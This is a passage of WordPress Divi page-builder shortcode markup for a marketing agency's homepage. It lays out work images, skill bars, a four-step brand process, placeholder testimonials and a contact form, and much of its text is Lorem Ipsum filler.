button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\" hover_enabled=\"0\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" hover_enabled=\"0\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" 